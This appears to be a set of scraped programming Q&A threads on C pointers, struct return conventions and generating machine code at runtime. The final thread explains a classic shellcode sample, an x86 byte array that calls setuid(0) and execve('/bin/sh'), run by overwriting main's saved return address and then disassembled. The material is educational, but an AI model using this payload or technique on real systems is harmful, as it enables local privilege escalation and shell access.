Pointers and Pointer Functions - c

Studying the K&R book in C I had a few questions regarding complicated pointer declarations and pointer-array relationships.
1) What exactly is the difference between
char amessage[] = "this is a string";
and
char *pmessage
pmessage = "this is a string"
and when would you use one or the other?
From my understanding the first one allocates some amount of memory according to the size of the string, and then stores the chars in the memory. Then when you access amessage[] you just directly access whatever char you're looking for. For the second one you also allocate memory except you just access the data through a pointer whenever you need it. Is this the correct way of looking at it?
2) The book says that arrays when passed into functions are treated as if you gave the pointer to the first index of the array and thus you manipulate the array through manipulating the pointer even though you can still do syntax like a[i]. Is this true if you just created an array somewhere and want to access it or is it only true if you pass in an array into a function? For example:
char amessage[]= "hi";
char x = *(amessage + 1); // can I do this?
3) The book says the use of static is great in this particular function:
/* month_name: return name of n-th month */
char *month_name(int n)
{
static char *name[] = {
"Illegal month",
"January", "February", "March",
"April", "May", "June",
"July", "August", "September",
"October", "November", "December"
};
return (n < 1 || n > 12) ? name[0] : name[n];
}
I don't understand why exactly this is a good use of static. Is it because the char *name[] would get deleted after function return if it is not static (because its a local variable)? Then does that mean in c you can't do stuff like:
void testFunction(){
int x = 1;
return x;
}
Without x being deleted before you use the return value? (Sorry I guess this might not be a pointer question but it was in the pointer chapter).
4) There are some complicated declaration like
char (*(*x())[])()
I'm really confused as to what is going on. So the x() part means a function x that returns a pointer? But what kind of pointer does it return its just a "" without like int or void or w/e. Or does that mean a pointer to a function (but I thought that would be like (*x)())? And then after you add brackets (because I assume brackets have the next precedence)...what is that? An array of functions?
This kind of ties to my confusion with function pointers. If you have something like
int (*func)()
That means a pointer to a function that returns an int, and the name of that pointer is func, but what does it mean when its like int (*x[3])(). I don't understand how you can replace the pointer name with an array.
Thanks for any help!
Kevin

1) What exactly is the difference between
char amessage[] = "this is a string";
and
char *pmessage
pmessage = "this is a string"
and when would you use one or the other?
amessage will always refer to the memory holding this is a string\0. You cannot change the address it refers to. pmessage can be updated to point to any character in memory, whether or not it is part of a string. If you assign to pmessage, you might lose your only reference to this is a string\0. (It depends if you made references anywhere else.)
I would use char amessage[] if I intended to modify the contents of amessage[] in place. You cannot modify the memory that pmessage points to. Try this little program; comment out amessage[0]='H' and pmessage[0]='H'; one at a time and see that pmessage[0]='H'; causes a segmentation violation:
#include <stdio.h>
int main(int argc, char* argv[]) {
char amessage[]="howdy";
char *pmessage="hello";
amessage[0]='H';
pmessage[0]='H';
printf("amessage %s\n", amessage);
printf("pmessage %s\n", pmessage);
return 0;
}
Modifying a string that was hard-coded in the program is relatively rare; char *foo = "literal"; is probably more common, and the immutability of the string might be one reason why.
2) The book says that arrays when passed into functions are treated as
if you gave the pointer to the first index of the array and thus you
manipulate the array through manipulating the pointer even though you
can still do syntax like a[i]. Is this true if you just created an
array somewhere and want to access it or is it only true if you pass
in an array into a function? For example:
char amessage[]= "hi";
char x = *(amessage + 1); // can I do this?
You can do that, however it is pretty unusual:
$ cat refer.c
#include <stdio.h>
int main(int argc, char* argv[]) {
char amessage[]="howdy";
char x = *(amessage+1);
printf("x: %c\n", x);
return 0;
}
$ ./refer
x: o
$
At least, I have never seen a "production" program that did this with character strings. (And I'm having trouble thinking of a program that used pointer arithmetic rather than array subscripting on arrays of other types.)
3) The book says the use of static is great in this particular
function:
/* month_name: return name of n-th month */
char *month_name(int n)
{
static char *name[] = {
"Illegal month",
"January", "February", "March",
"April", "May", "June",
"July", "August", "September",
"October", "November", "December"
};
return (n < 1 || n > 12) ? name[0] : name[n];
}
I don't understand why exactly this is a good use of static. Is it
because the char *name[] would get deleted after function return if
it is not static (because its a local variable)? Then does that mean
in c you can't do stuff like:
void testFunction(){
int x = 1;
return x;
}
Without x being deleted before you use the return value? (Sorry I
guess this might not be a pointer question but it was in the pointer
chapter).
In this specific case, I believe the static is needless; at least GCC is able to determine that the strings are not modified and stores them in the .rodata read-only data segment. However, that might be an optimization with string literals. Your example with another primitive data type (int) also works fine because C passes everything by value both on function calls and function returns. However, if you're returning a pointer to an object allocated on the stack then the static is absolutely necessary, because it determines where in memory the object lives:
$ cat stackarray.c ; make stackarray
#include <stdio.h>
struct foo { int x; };
struct foo *bar() {
struct foo array[2];
array[0].x=1;
array[1].x=2;
return &array[1];
}
int main(int argc, char* argv[]) {
struct foo* fp;
fp = bar();
printf("foo.x: %d\n", fp->x);
return 0;
}
cc stackarray.c -o stackarray
stackarray.c: In function ‘bar’:
stackarray.c:9:2: warning: function returns address of local variable
If you change the storage duration of array to static, then the address that is being returned is not automatically allocated, and will continue to work even after the function has returned:
$ cat staticstackarray.c ; make staticstackarray ; ./staticstackarray
#include <stdio.h>
struct foo { int x; };
struct foo *bar() {
static struct foo array[2];
array[0].x=1;
array[1].x=2;
return &array[1];
}
int main(int argc, char* argv[]) {
struct foo* fp;
fp = bar();
printf("foo.x: %d\n", fp->x);
return 0;
}
cc staticstackarray.c -o staticstackarray
foo.x: 2
You can see where the memory allocation changes between stackarray and staticstackarray:
$ readelf -S stackarray | grep -A 3 '\.data'
[24] .data PROGBITS 0000000000601010 00001010
0000000000000010 0000000000000000 WA 0 0 8
[25] .bss NOBITS 0000000000601020 00001020
0000000000000010 0000000000000000 WA 0 0 8
$ readelf -S staticstackarray | grep -A 3 '\.data'
[24] .data PROGBITS 0000000000601010 00001010
0000000000000010 0000000000000000 WA 0 0 8
[25] .bss NOBITS 0000000000601020 00001020
0000000000000018 0000000000000000 WA 0 0 8
The .bss section in the version without static is 8 bytes smaller than the .bss section in the version with static. Those 8 bytes in the .bss section provide the persistent address that is returned.
So you can see that the case with strings didn't really make a difference -- at least GCC doesn't care -- but pointers to other types of objects, the static makes all the difference in the world.
However, most functions that return data in function-local-static storage have fallen out of favor. strtok(3), for example, extracts tokens from a string, and if subsequent calls to strtok(3) include NULL as the first argument to indicate that the function should re-use the string passed in the first call. This is neat, but means a program can never tokenize two separate strings simultaneously, and multiple-threaded programs cannot reliably use this routine. So a reentrant version is available, strtok_r(3), that takes an additional argument to store information between calls. man -k _r will show a surprising number of functions that have reentrant versions available, and the primary change is reducing static use in functions.
4) There are some complicated declaration like
char (*(*x())[])()
I'm really confused as to what is going on. So the x() part means a
function x that returns a pointer? But what kind of pointer does it
return its just a "" without like int or void or w/e. Or does that
mean a pointer to a function (but I thought that would be like
(*x)())? And then after you add brackets (because I assume brackets
have the next precedence)...what is that? An array of functions?
This kind of ties to my confusion with function pointers. If you have
something like
int (*func)()
That means a pointer to a function that returns an int, and the name
of that pointer is func, but what does it mean when its like int
(*x[3])(). I don't understand how you can replace the pointer name
with an array.
First, don't panic. You'll almost never need anything this complicated. Sometimes it is very handy to have a table of function pointers and call the next one based on a state transition diagram. Sometimes you're installing signal handlers with sigaction(2). You'll need slightly complicated function pointers then. However, if you use cdecl(1) to decipher what you need, it'll make sense:
struct sigaction {
void (*sa_handler)(int);
void (*sa_sigaction)(int, siginfo_t *, void *);
sigset_t sa_mask;
int sa_flags;
void (*sa_restorer)(void);
};
cdecl(1) only understands a subset of C native types, so replace siginfo_t with void and you can see roughly what is required:
$ cdecl
Type `help' or `?' for help
cdecl> explain void (*sa_sigaction)(int, void *, void *);
declare sa_sigaction as pointer to function
(int, pointer to void, pointer to void) returning void
Expert C Programming: Deep C Secrets has an excellent chapter devoted to understanding more complicated declarations, and even includes a version of cdecl, in case you wish to extend it to include more types and typedef handling. It's well worth reading.

This has to do with part 3 and is a kind of reply/addition to sarnold's comment. He's right in that with or without the static, the string literals are always going to be apart of the .data .rodata segment and essentially only created once. However, without the use of the word static, the actual array, that is the array of char pointers, will in fact be created on the stack each time the function is called.
With the use of static:
Dump of assembler code for function month_name:
0x08048394 <+0>: push ebp
0x08048395 <+1>: mov ebp,esp
0x08048397 <+3>: cmp DWORD PTR [ebp+0x8],0x0
0x0804839b <+7>: jle 0x80483a3 <month_name+15>
0x0804839d <+9>: cmp DWORD PTR [ebp+0x8],0xc
0x080483a1 <+13>: jle 0x80483aa <month_name+22>
0x080483a3 <+15>: mov eax,ds:0x8049720
0x080483a8 <+20>: jmp 0x80483b4 <month_name+32>
0x080483aa <+22>: mov eax,DWORD PTR [ebp+0x8]
0x080483ad <+25>: mov eax,DWORD PTR [eax*4+0x8049720]
0x080483b4 <+32>: pop ebp
0x080483b5 <+33>: ret
Without the use of static:
Dump of assembler code for function month_name:
0x08048394 <+0>: push ebp
0x08048395 <+1>: mov ebp,esp
0x08048397 <+3>: sub esp,0x40
0x0804839a <+6>: mov DWORD PTR [ebp-0x34],0x8048514
0x080483a1 <+13>: mov DWORD PTR [ebp-0x30],0x8048522
0x080483a8 <+20>: mov DWORD PTR [ebp-0x2c],0x804852a
0x080483af <+27>: mov DWORD PTR [ebp-0x28],0x8048533
0x080483b6 <+34>: mov DWORD PTR [ebp-0x24],0x8048539
0x080483bd <+41>: mov DWORD PTR [ebp-0x20],0x804853f
0x080483c4 <+48>: mov DWORD PTR [ebp-0x1c],0x8048543
0x080483cb <+55>: mov DWORD PTR [ebp-0x18],0x8048548
0x080483d2 <+62>: mov DWORD PTR [ebp-0x14],0x804854d
0x080483d9 <+69>: mov DWORD PTR [ebp-0x10],0x8048554
0x080483e0 <+76>: mov DWORD PTR [ebp-0xc],0x804855e
0x080483e7 <+83>: mov DWORD PTR [ebp-0x8],0x8048566
0x080483ee <+90>: mov DWORD PTR [ebp-0x4],0x804856f
0x080483f5 <+97>: cmp DWORD PTR [ebp+0x8],0x0
0x080483f9 <+101>: jle 0x8048401 <month_name+109>
0x080483fb <+103>: cmp DWORD PTR [ebp+0x8],0xc
0x080483ff <+107>: jle 0x8048406 <month_name+114>
0x08048401 <+109>: mov eax,DWORD PTR [ebp-0x34]
0x08048404 <+112>: jmp 0x804840d <month_name+121>
0x08048406 <+114>: mov eax,DWORD PTR [ebp+0x8]
0x08048409 <+117>: mov eax,DWORD PTR [ebp+eax*4-0x34]
0x0804840d <+121>: leave
0x0804840e <+122>: ret
As you can see in the second example (without static), the array is allocated on the stack each time:
0x08048397 <+3>: sub esp,0x40
and the pointers are loaded into the array:
0x0804839a <+6>: mov DWORD PTR [ebp-0x34],0x8048514
0x080483a1 <+13>: mov DWORD PTR [ebp-0x30],0x8048522
...
So there's obviously a little more to be set up each time the function is called if you decide not to use static.

3) It has nothing to do with that - static creates the array once, as opposed to creating it every time the function runs. Since the data in the array never changes, it is more efficient not to re-create it every time. Your example function would work fine, every time. It's a value. It won't be deleted before you can return it. That would be very unintuitive.

4) Adding some more information in the reply for the 4) point:
I'm following the next book to learn C: C for pascal Programmers by Norman J. Landis.It's quite old and it's thought to be a bridge from pascal to C; but I find it so so so useful, completed and explained at the lowest level of the machine. For me it's an awesome book.
The chapter 5.3.1 in the appendix A talks precisely about this. (Blockquotes is content extracted from the book)
Definition of base type:
The type specifier appearing in the declaration containing the declarator is called the >base type
Basically, in bool x => bool is the base type and in int x[] => the base type for the array is int and the base type for the x is array of int.
In order to interpret complex declarators, the following rules apply:
Apply asterisk operators first.
Apply the "function of base type"( () ) and "array of returning base type" ( [] ) >operators afterward, from right to left.
Of course, parentheses may enclose a declarator to alter the order of evaluation.
And there it is the same example changing the letter x by a letter w:
How I 'parse' this: char (*(*w())[])();
I'm going from outside of the parentheses to inside, after I follow the 2 rules said above. Steps:
Outside any parentheses, we find the function declarator. Then, so far we have a function returning a char.
Now, we enter in the parentheses and process prior pointer and after array.
Such pointer, is a pointer of "the upper base type", which is, we say, a function
returning a char. Then we got pointer of function returning a char, so far.
Following to the array, it's an array of "the upper base type". And "the upper base type" = pointer to function returning a char.
Now, go into the deepest parentheses, we find a pointer and a function. Same manner, first pointer, after function.
We process the pointer => pointer to an array of pointers to functions returning a char.
And finally the function declarator, and we got: Function returning a pointer to an array of pointers to functions returning a char.
I hope now it's much clear.
But you'll need some time and practice to really understand and hand this, but once you get it, it's pretty easy ;)

Related

How are oversized struct returned on the stack?

It is said that returning an oversized struct by value (as opposed to returning a pointer to the struct) from a function incurs unnecessary copy on the stack. By "oversized", I mean a struct that cannot fit in the return registers.
However, to quote Wikipedia
When an oversized struct return is needed, another pointer to a caller-provided space is prepended as the first argument, shifting all other arguments to the right by one place.
and
When returning struct/class, the calling code allocates space and passes a pointer to this space via a hidden parameter on the stack. The called function writes the return value to this address.
It appears that at least on x86 architectures, the struct in question is directly written by the callee to the memory appointed by the caller, so why would there be a copy then? Does returning oversized structs really incur copy on the stack?
If the function inlines, the copying through the return-value object can be fully optimized away. Otherwise, maybe not, and arg copying definitely can't be.
It appears that at least on x86 architectures, the struct in question is directly written by the callee to the memory appointed by the caller, so why would there be a copy then? Does returning oversized structs really incur copy on the stack?
It depends what the caller does with the return value,; if it's assigned to a provably private object (escape analysis), that object can be the return-value object, passed as the hidden pointer.
But if the caller actually wants to assign the return value to other memory, then it does need a temporary.
struct large retval = some_func(); // no extra copying at all
*p = some_func() // caller will make space for a local return-value object & copy.
(Unless the compiler knows that p is just pointing to a local struct large tmp;, and escape analysis can prove that there's no way some global variable could have a pointer to that same tmp var.)
long version, same thing with more details:
In the C abstract machine, there's a "return value object", and return foo copies the named variable foo to that object, even if it's a large struct. Or return (struct lg){1,2}; copies an anonymous struct. The return-value object itself is anonymous; nothing can take its address. (You can't int *p = &foo(123);). This makes it easier to optimize away.
In the caller, that anonymous return-value object can be assigned to whatever you want, which would be another copy if compilers didn't optimize anything. (All of this applies for any type, even int). Of course, compilers that aren't total garbage will avoid some, ideally all, of that copying, when doing so can't possibly change the observable results. And that depends on the design of the calling convention. As you say, most conventions, including all the mainstream x86 and x86-64 conventions, pass a "hidden pointer" arg for return values they choose not to return in register(s) for whatever reason (size, C++ having a non-trivial constructor).
struct large retval = foo(...);
For such calling conventions, the above code is effectively transformed to
struct large retval;
foo(&retval, ...);
So it's C return-value object actually is a local in the stack-frame of its caller. foo() is allowed to store into that return-value object whenever it wants during execution, including before reading some other objects. This allows optimization within the callee (foo) as well, so a struct large tmp = ... / return tmp can be optimized away to just store into the return-value object.
So there's zero extra copying when the caller does just want to assign the function return value to a newly declared local var. (Or to a local var which it can prove is still private, via escape analysis. i.e. not pointed-to by any global vars).
But what if the caller wants to store the return value somewhere else?
void caller2(struct large *lgp) {
*lgp = foo();
}
Can *lgp be the return-value object, or do we need to introduce a local temporary?
void caller2(struct large *lgp) {
// foo_asm(lgp); // nope, possibly unsafe
struct large retval; foo(&retval); *lgp = retval; // safe
}
If you want functions to be able to write large structs to arbitrary locations, you have to "sign off" on it by making that effect visible in your source.
What prevents the usage of a function argument as hidden pointer? for more details about why *lgp can't be the return-value object / hidden pointer, and another example. "A function is allowed to assume its return-value object (pointed-to by a hidden pointer) is not the same object as anything else". Also details of whether struct large *restrict lgp would make it safe: probably yes if the function doesn't longjmp (otherwise stores to the supposedly anonymous retval object might end up as visible side effects without return having been reached), but GCC doesn't look for that optimization.
Why is tailcall optimization not performed for types of class MEMORY? - return bar() where bar returns the same struct should be possible as an optimized tailcall, causing extra copying. This can even introduce extra copying of the whole struct, as well as failing to optimize call bar / ret into jmp bar.
how c compiler treats a struct return value from a function, in ASM - thresholds for returning in registers. e.g. i386 System V always returns structs in memory, even struct {int x;};.
Is it possible within a function to get the memory address of the variable initialized by the return value?
C/C++ returning struct by value under the hood an actual example (but unfortunately using debug-mode compiler-generated asm, so it contains copying that isn't necessary).
How do objects work in x86 at the assembly level? example at the bottom of how x86-64 System V packs the bytes of a struct into RDX:RAX, or just RAX if less than 8 bytes.
An example showing early stores to the return-value object (instead of copying)
(all source + asm on the Godbolt compiler explorer)
// more or less extra size will get compilers to copy it around with SSE2 or not
struct large { int first, second; char pad[0];};
int *global_ptr;
extern int a;
NOINLINE // __attribute__((noinline))
struct large foo() {
struct large tmp = {1,2};
if (a)
tmp.second = *global_ptr;
return tmp;
}
(targeting GNU/Linux) clang -m32 -O3 -mregparm=1 creates an implementation that writes its return-value object before it's done reading everything else, exactly the case that would make it unsafe for the caller to pass a pointer to some globally-reachable memory.
The asm makes it clear that tmp is fully optimized away, or is the retval object.
# clang -O3 -m32 -mregparm=1
foo:
mov dword ptr [eax + 4], 2
mov dword ptr [eax], 1 # store tmp into the retval object
cmp dword ptr [a], 0
je .LBB0_2 # if (a == 0) goto ret
mov ecx, dword ptr [global_ptr] # load the global
mov ecx, dword ptr [ecx] # deref it
mov dword ptr [eax + 4], ecx # and store to the retval object
.LBB0_2:
ret
(-mregparm=1 means pass the first arg in EAX, less noisy and easier to quickly visually distinguish from stack space than passing on the stack. Fun fact: i386 Linux compiles the kernel with -mregparm=3. But fun fact #2: if a hidden pointer is passed on the stack (i.e. no regparm), that arg is callee pops, unlike the rest. The function will use ret 4 to do ESP+=4 after popping the return address into EIP.)
In a simple caller, the compiler just reserves some stack space, passes a pointer to it, and then can load member variables from that space.
int caller() {
struct large lg = {4, 5}; // initializer is dead, foo can't read its retval object
lg = foo();
return lg.second;
}
caller:
sub esp, 12
mov eax, esp
call foo
mov eax, dword ptr [esp + 4]
add esp, 12
ret
But with a less trivial caller:
int caller() {
struct large lg = {4, 5};
global_ptr = &lg.first;
// unknown(&lg); // or this: as a side effect, might set global_ptr = &tmp->first;
lg = foo(); // (except by inlining) the compiler can't know if foo() looks at global_ptr
return lg.second;
}
caller:
sub esp, 28 # reserve space for 2 structs, and alignment
mov dword ptr [esp + 12], 5
mov dword ptr [esp + 8], 4 # materialize lg
lea eax, [esp + 8]
mov dword ptr [global_ptr], eax # point global_ptr at it
lea eax, [esp + 16] # hidden first arg *not* pointing to lg
call foo
mov eax, dword ptr [esp + 20] # reload from the retval object
add esp, 28
ret
Extra copying with *lgp = foo();
int caller2(struct large *lgp) {
global_ptr = &lgp->first;
*lgp = foo();
return lgp->second;
}
# with GCC11.1 this time, SSE2 8-byte copying unlike clang
caller2: # incoming arg: struct large *lgp in EAX
push ebx #
mov ebx, eax # lgp, tmp89 # lgp needed after foo returns
sub esp, 24 # reserve space for a retval object (and waste 16 bytes)
mov DWORD PTR global_ptr, eax # global_ptr, lgp
lea eax, [esp+8] # hidden pointer to the retval object
call foo #
movq xmm0, QWORD PTR [esp+8] # 8-byte copy of both halves
movq QWORD PTR [ebx], xmm0 # *lgp_2(D), tmp86
mov eax, DWORD PTR [ebx+4] # lgp_2(D)->second, lgp_2(D)->second # reload int return value
add esp, 24
pop ebx
ret
The copy to *lgp needs to happen, but it's somewhat of a missed optimization to reload from there, instead of from [esp+12]. (Saves a byte of code size at the cost of more latency.)
Clang does the copy with two 4-byte integer register mov loads/stores, but one of them is into EAX so it already has the return value ready.
You might also want to look at the result of assigning to memory freshly allocated with malloc. Compilers know that nothing else can (legally) be pointing to the newly allocated memory: that would be use-after-free undefined behaviour. So they may allow passing on a pointer from malloc as the return-value object if it hasn't been passed to anything else yet.
Related fun fact: passing large structs by value always requires a copy (if the function doesn't inline). But as discussed in comments, the details depend on the calling convention. Windows differs from i386 / x86-64 System V calling conventions (all non-Windows OSes) on this:
SysV calling conventions copy the whole struct to the stack. (if they're too large to fit in a pair of registers for x86-64)
Windows x64 makes a copy and passes (like a normal arg) a pointer to that copy. The callee "owns" the arg and can modify it, so a tmp copy is still needed. (And no, const struct large foo has no effect.)
https://godbolt.org/z/ThMrE9rqT shows x86-64 GCC targeting Linux vs. x64 MSVC targeting Windows.
This really depends on your compiler, but in general the way this works is that the caller allocates the memory for the struct return value, but the callee also allocates stack space for any intermediate value of that structure. This intermediate allocation is used when the function is running, and then the struct is copied onto the caller's memory when the function returns.
For reference as to why your solution won't always work, consider a program which has two of the same struct and returns one based on some condition:
large_t returntype(int condition) {
large_t var1 = {5};
large_t var2 = {6};
// More intermediate code here
if(condition) return var1;
else return var2;
}
In this case, both may be required by the intermediate code, but the return value is not known at compile time, so the compiler doesn't know which to initialize on the caller's stack space. It's easier to just keep it local and copy on return.
EDIT: Your solution may be the case in simple functions, but it really depends on the optimizations performed by each individual compiler. If you're really interested in this, check out https://godbolt.org/

Generating functions at runtime in C

I would like to generate a function at runtime in C. And by this I mean I would essentially like to allocate some memory, point at it and execute it via function pointer. I realize this is a very complex topic and my question is naïve. I also realize there are some very robust libraries out there that do this (e.g. nanojit).
But I would like to learn the technique, starting with the basics. Could someone knowledgeable give me a very simple example in C?
EDIT: The answer below is great but here is the same example for Windows:
#include <Windows.h>
#define MEMSIZE 100*1024*1024
typedef void (*func_t)(void);
int main() {
HANDLE proc = GetCurrentProcess();
LPVOID p = VirtualAlloc(
NULL,
MEMSIZE,
MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
func_t func = (func_t)p;
PDWORD code = (PDWORD)p;
code[0] = 0xC3; // ret
if(FlushInstructionCache(
proc,
NULL,
0))
{
func();
}
CloseHandle(proc);
VirtualFree(p, 0, MEM_RELEASE);
return 0;
}
As said previously by other posters, you'll need to know your platform pretty well.
Ignoring the issue of casting a object pointer to a function pointer being, technically, UB, here's an example that works for x86/x64 OS X (and possibly Linux too). All the generated code does is return to the caller.
#include <unistd.h>
#include <sys/mman.h>
typedef void (*func_t)(void);
int main() {
/*
* Get a RWX bit of memory.
* We can't just use malloc because the memory it returns might not
* be executable.
*/
unsigned char *code = mmap(NULL, getpagesize(),
PROT_READ|PROT_EXEC|PROT_WRITE,
MAP_SHARED|MAP_ANON, 0, 0);
/* Technically undefined behaviour */
func_t func = (func_t) code;
code[0] = 0xC3; /* x86 'ret' instruction */
func();
return 0;
}
Obviously, this will be different across different platforms but it outlines the basics needed: get executable section of memory, write instructions, execute instructions.
This requires you to know your platform. For instance, what is the C calling convention on your platform? Where are parameters stored? What register holds the return value? What registers must be saved and restored? Once you know that, you can essentially write some C code that assembles code into a block of memory, then cast that memory into a function pointer (though this is technically forbidden in ANSI C, and will not work depending if your platform marks some pages of memory as non-executable aka NX bit).
The simple way to go about this is simply to write some code, compile it, then disassemble it and look at what bytes correspond to which instructions. You can write some C code that fills allocated memory with that collection of bytes and then casts it to a function pointer of the appropriate type and executes.
It's probably best to start by reading the calling conventions for your architecture and compiler. Then learn to write assembly that can be called from C (i.e., follows the calling convention).
If you have tools, they can help you get some things right easier. For example, instead of trying to design the right function prologue/epilogue, I can just code this in C:
int foo(void* Data)
{
return (Data != 0);
}
Then (MicrosoftC under Windows) feed it to "cl /Fa /c foo.c". Then I can look at "foo.asm":
_Data$ = 8
; Line 2
push ebp
mov ebp, esp
; Line 3
xor eax, eax
cmp DWORD PTR _Data$[ebp], 0
setne al
; Line 4
pop ebp
ret 0
I could also use "dumpbin /all foo.obj" to see that the exact bytes of the function were:
00000000: 55 8B EC 33 C0 83 7D 08 00 0F 95 C0 5D C3
Just saves me some time getting the bytes exactly right...

c generate function and call it

#include <stdio.h>
#define uint unsigned int
#define AddressOfLabel(sectionname,out) __asm{mov [out],offset sectionname};
void* CreateFunction(void* start,void *end) {
uint __start=(uint)start,__end=(uint)end-1
,size,__func_runtime;
void* func_runtime=malloc(size=(((__end)-(__start)))+1);
__func_runtime=(uint)func_runtime;
memcpy((void*)(__func_runtime),start,size);
((char*)func_runtime)[size]=0xC3; //ret
return func_runtime;
}
void CallRuntimeFunction(void* address) {
__asm {
call address
}
}
main() {
void* _start,*_end;
AddressOfLabel(__start,_start);
AddressOfLabel(__end,_end);
void* func = CreateFunction(_start,_end);
CallRuntimeFunction(func); //I expected this method to print "Test"
//but this method raised exception
return 0;
__start:
printf("Test");
__end:
}
CreateFunction - takes two points in memory (function scope), allocate, copy it to the allocated memory and returns it (The void* used like a function to call with Assembly)
CallRuntimeFunction - runs the functions that returns from CreateFunction
#define AddressOfLabel(sectionname,out) - Outs the address of label (sectionname) to variable (out)
When I debugged this code and stepped in the call of CallRuntimeFunction and go to disassembly ,
I saw alot of ??? instead of assembly code of between __start and __end labels.
I tried to copy machine code between two labels and then run it. But I don't have any idea why I can't call function that allocated with malloc.
Edit:
I changed some code and done part of the work.
Runtime Function's memory allocate:
void* func_runtime=VirtualAlloc(0, size=(((__end)-(__start)))+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Copy from function scope:
CopyMemory((void*)(__func_runtime),start,size-1);
But when I ran this program I can that:
mov esi,esp
push 0E4FD14h
call dword ptr ds:[0E55598h] ; <--- printf ,after that I don't know what is it
add esp,4
cmp esi,esp
call 000B9DBB ; <--- here
mov dword ptr [ebp-198h],0
lea ecx,[ebp-34h]
call 000B9C17
mov eax,dword ptr [ebp-198h]
jmp 000D01CB
ret
At here it enters to another function and weird stuff.
void CallRuntimeFunction(void* address) {
__asm {
call address
}
}
here address is a "pointer" to a parameter of this function which is also a pointer.
pointer to a pointer
use:
void CallRuntimeFunction(void* address) {
_asm {
mov ecx,[address] //we get address of "func"
mov ecx,[ecx] //we get "func"
call [ecx] //we jump func(ecx is an address. yes)
}
}
you wanna call func which is a pointer. when passed in your CallRunt... function, this generates a new pointer to point to that pointer. Pointer of second degree.
void* func = CreateFunction(_start,_end);
yes func is a pointer
Important: check your compilers "calling convention" options. Try the decl one
Be sure to invalidate the caches (both instruction and data) between the function code generation and its calling. See self-modifying code for further info.

can anyone explain this code to me?

WARNING: This is an exploit. Do not execute this code.
//shellcode.c
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main() {
int *ret; //ret pointer for manipulating saved return.
ret = (int *)&ret + 2; //setret to point to the saved return
//value on the stack.
(*ret) = (int)shellcode; //change the saved return value to the
//address of the shellcode, so it executes.
}
can anyone give me a better explanation ?
Apparently, this code attempts to change the stack so that when the main function returns, program execution does not return regularly into the runtime library (which would normally terminate the program), but would jump instead into the code saved in the shellcode array.
1) int *ret;
defines a variable on the stack, just beneath the main function's arguments.
2) ret = (int *)&ret + 2;
lets the ret variable point to a int * that is placed two ints above ret on the stack. Supposedly that's where the return address is located where the program will continue when main returns.
2) (*ret) = (int)shellcode;
The return address is set to the address of the shellcode array's contents, so that shellcode's contents will be executed when main returns.
shellcode seemingly contains machine instructions that possibly do a system call to launch /bin/sh. I could be wrong on this as I didn't actually disassemble shellcode.
P.S.: This code is machine- and compiler-dependent and will possibly not work on all platforms.
Reply to your second question:
and what happens if I use
ret=(int)&ret +2 and why did we add 2?
why not 3 or 4??? and I think that int
is 4 bytes so 2 will be 8bytes no?
ret is declared as an int*, therefore assigning an int (such as (int)&ret) to it would be an error. As to why 2 is added and not any other number: apparently because this code assumes that the return address will lie at that location on the stack. Consider the following:
This code assumes that the call stack grows downward when something is pushed on it (as it indeed does e.g. with Intel processors). That is the reason why a number is added and not subtracted: the return address lies at a higher memory address than automatic (local) variables (such as ret).
From what I remember from my Intel assembly days, a C function is often called like this: First, all arguments are pushed onto the stack in reverse order (right to left). Then, the function is called. The return address is thus pushed on the stack. Then, a new stack frame is set up, which includes pushing the ebp register onto the stack. Then, local variables are set up on the stack beneath all that has been pushed onto it up to this point.
Now I assume the following stack layout for your program:
+-------------------------+
| function arguments | |
| (e.g. argv, argc) | | (note: the stack
+-------------------------+ <-- ss:esp + 12 | grows downward!)
| return address | |
+-------------------------+ <-- ss:esp + 8 V
| saved ebp register |
+-------------------------+ <-- ss:esp + 4 / ss:ebp - 0 (see code below)
| local variable (ret) |
+-------------------------+ <-- ss:esp + 0 / ss:ebp - 4
At the bottom lies ret (which is a 32-bit integer). Above it is the saved ebp register (which is also 32 bits wide). Above that is the 32-bit return address. (Above that would be main's arguments -- argc and argv -- but these aren't important here.) When the function executes, the stack pointer points at ret. The return address lies 64 bits "above" ret, which corresponds to the + 2 in
ret = (int*)&ret + 2;
It is + 2 because ret is a int*, and an int is 32 bit, therefore adding 2 means setting it to a memory location 2 × 32 bits (=64 bits) above (int*)&ret... which would be the return address' location, if all the assumptions in the above paragraph are correct.
Excursion: Let me demonstrate in Intel assembly language how a C function might be called (if I remember correctly -- I'm no guru on this topic so I might be wrong):
// first, push all function arguments on the stack in reverse order:
push argv
push argc
// then, call the function; this will push the current execution address
// on the stack so that a return instruction can get back here:
call main
// (afterwards: clean up stack by removing the function arguments, e.g.:)
add esp, 8
Inside main, the following might happen:
// create a new stack frame and make room for local variables:
push ebp
mov ebp, esp
sub esp, 4
// access return address:
mov edi, ss:[ebp+4]
// access argument 'argc'
mov eax, ss:[ebp+8]
// access argument 'argv'
mov ebx, ss:[ebp+12]
// access local variable 'ret'
mov edx, ss:[ebp-4]
...
// restore stack frame and return to caller (by popping the return address)
mov esp, ebp
pop ebp
retf
See also: Description of the procedure call sequence in C for another explanation of this topic.
The actual shellcode is:
(gdb) x /25i &shellcode
0x804a040 <shellcode>: xor %eax,%eax
0x804a042 <shellcode+2>: xor %ebx,%ebx
0x804a044 <shellcode+4>: mov $0x17,%al
0x804a046 <shellcode+6>: int $0x80
0x804a048 <shellcode+8>: jmp 0x804a069 <shellcode+41>
0x804a04a <shellcode+10>: pop %esi
0x804a04b <shellcode+11>: mov %esi,0x8(%esi)
0x804a04e <shellcode+14>: xor %eax,%eax
0x804a050 <shellcode+16>: mov %al,0x7(%esi)
0x804a053 <shellcode+19>: mov %eax,0xc(%esi)
0x804a056 <shellcode+22>: mov $0xb,%al
0x804a058 <shellcode+24>: mov %esi,%ebx
0x804a05a <shellcode+26>: lea 0x8(%esi),%ecx
0x804a05d <shellcode+29>: lea 0xc(%esi),%edx
0x804a060 <shellcode+32>: int $0x80
0x804a062 <shellcode+34>: xor %ebx,%ebx
0x804a064 <shellcode+36>: mov %ebx,%eax
0x804a066 <shellcode+38>: inc %eax
0x804a067 <shellcode+39>: int $0x80
0x804a069 <shellcode+41>: call 0x804a04a <shellcode+10>
0x804a06e <shellcode+46>: das
